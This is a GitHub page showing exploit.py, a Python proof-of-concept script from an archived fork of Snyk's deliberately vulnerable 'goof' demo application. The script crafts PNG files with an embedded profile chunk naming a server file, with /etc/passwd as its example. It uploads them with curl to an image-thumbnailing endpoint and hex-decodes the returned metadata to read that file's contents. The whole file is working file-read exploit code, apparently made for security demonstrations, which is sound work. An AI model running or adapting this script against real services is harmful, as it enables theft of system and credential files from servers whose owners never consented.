This repository has been archived by the owner on Nov 6, 2023. It is now read-only.
generated from snyk-partners/goof
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
executable file
·79 lines (62 loc) · 2.51 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
#!/usr/bin/env python3
import subprocess
import sys
import time
import os
import platform
def build_exploit_image():
print("Building exploit image...")
execute_command("docker build -t exploit . -f Dockerfile.exploit")
def execute_command(command):
# print("Executing: "+command)
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
return stdout.decode()
def decode_png(png_file = os.getcwd()+"/result.png"):
build_exploit_image()
if png_file[0] != "/":
png_file = os.getcwd()+"/"+png_file
print("Decoding content from "+png_file+"...\n")
command = "docker run --rm -it -v "+png_file+":/result.png exploit identify -verbose /result.png"
image_data = execute_command(command)
lines = image_data.split("\n")
try:
start_raw_data = ["Raw profile type:" in line for line in lines].index(True) + 3
except:
print("Unable to find hacker metadata in the image. Nothing to see here!")
return ""
end_raw_data = lines[start_raw_data:].index('\r') + start_raw_data
raw_data_str = "".join(lines[start_raw_data:end_raw_data])
decoded_str = bytes.fromhex(raw_data_str).decode("utf-8")
return decoded_str
if len(sys.argv) < 2:
command = ""
else:
command = sys.argv[1]
if command == "encode":
build_exploit_image()
image = sys.argv[2]
file2cat = sys.argv[3]
encoded_image = "encoded-" + image
print("Encoding " + file2cat +" into " + image +" as " + encoded_image + " ...")
command = "docker run --rm -it -v "+os.getcwd()+":/imagedir exploit pngcrush -text a \"profile\" \"" + file2cat +"\" /imagedir/" + image +" /imagedir/" + encoded_image
execute_command(command)
print("File encoded as " + encoded_image)
elif command == "decode":
print(decode_png(png_file=sys.argv[2]))
elif command == "upload":
image = sys.argv[2]
if len(sys.argv) > 2:
host = sys.argv[3]
else:
host = "localhost:5001"
print("Sending "+image+" to "+host+"...")
execute_command("curl "+host+"/upload -F 'file=@"+image+"' --compressed -so result.png")
print("Thumbnailed image received as result.png")
else:
print("Usage: python3 exploit.py <encode|decode|upload> <image> <file2cat> <host>")
print()
print("Example: python3 exploit.py encode image.png /etc/passwd")
print("Example: python3 exploit.py decode result.png")
print("Example: python3 exploit.py upload image.png localhost:5001")
print()